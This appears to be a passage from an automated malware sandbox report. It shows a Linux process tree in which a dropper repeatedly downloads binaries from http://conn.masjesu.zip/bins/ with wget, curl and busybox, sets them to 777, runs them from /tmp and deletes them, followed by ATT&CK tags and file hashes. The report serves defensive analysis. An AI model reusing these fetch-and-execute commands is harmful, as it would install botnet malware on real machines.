/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3./3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:972
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:973
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:976
-
-
/bin/chmodchmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- System Network Configuration Discovery
PID:1000
-
-
/bin/chmodchmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Executes dropped EXE
PID:1002
-
-
/bin/rmrm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:1003
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- System Network Configuration Discovery
PID:1004
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1005
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- System Network Configuration Discovery
PID:1007
-
-
/bin/chmodchmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- File and Directory Permissions Modification
PID:1008
-
-
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Executes dropped EXE
PID:1009
-
-
/bin/rmrm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:1010
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- System Network Configuration Discovery
PID:1011
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1012
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- System Network Configuration Discovery
PID:1014
-
-
/bin/chmodchmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- File and Directory Permissions Modification
PID:1015
-
-
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Executes dropped EXE
PID:1016
-
-
/bin/rmrm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:1017
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- System Network Configuration Discovery
PID:1018
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1019
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:1021
-
-
/bin/chmodchmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- File and Directory Permissions Modification
PID:1022
-
-
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Executes dropped EXE
PID:1023
-
-
/bin/rmrm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:1024
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
114B
MD5546071c6a6aeff34580b4d1a9b35a7c3
SHA1dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA2562d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7